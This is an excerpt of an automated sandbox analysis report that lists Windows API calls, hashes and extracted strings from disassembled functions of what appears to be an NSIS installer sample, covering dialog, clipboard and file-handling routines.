                                                                                      • Instruction Fuzzy Hash: 4FC1A074E00218CFEB55DFA5D994B9DBBB2BF89310F2080AAD409AB365DB355E85CF10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7152c44eb022f9a603cfa3d2506b6ab0f32e4845f0c8ccf1cb2805dcf9857fae
                                                                                      • Instruction ID: 9bb4e47d6e5bab2ed3ee6e4820af4b3d9a4db3e09cc07c5e5fce9c3dff8d6e6a
                                                                                      • Opcode Fuzzy Hash: 7152c44eb022f9a603cfa3d2506b6ab0f32e4845f0c8ccf1cb2805dcf9857fae
                                                                                      • Instruction Fuzzy Hash: CCD09E74D4421C9BDB11DF54DC503ECB7B0BB99310F102495804CA7100D7719E94CE56
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: (7B${
                                                                                      • API String ID: 590372296-525222780
                                                                                      • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                      • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                      • EnableWindow.USER32(?,?), ref: 00404147
                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                      • String ID: (7B
                                                                                      • API String ID: 184305955-3251261122
                                                                                      • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                      • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                      APIs
                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                      • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76F93420,00435000,00000000), ref: 00403B59
                                                                                      • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                      • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                      • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-1425696872
                                                                                      • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                      • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                      • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                      • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: N
                                                                                      • API String ID: 3103080414-1130791706
                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                      • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                      • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                        • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                        • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                        • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                        • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                        • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: (7B$A
                                                                                      • API String ID: 2624150263-3645020878
                                                                                      • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                      • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                      • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                      • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 00402F80
                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                      • Inst, xrefs: 00403017
                                                                                      • soft, xrefs: 00403020
                                                                                      • Null, xrefs: 00403029
                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-787788815
                                                                                      • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                      • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                      • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                      • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                      • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                      Strings
                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-730719616
                                                                                      • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                      • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                      • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                      • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
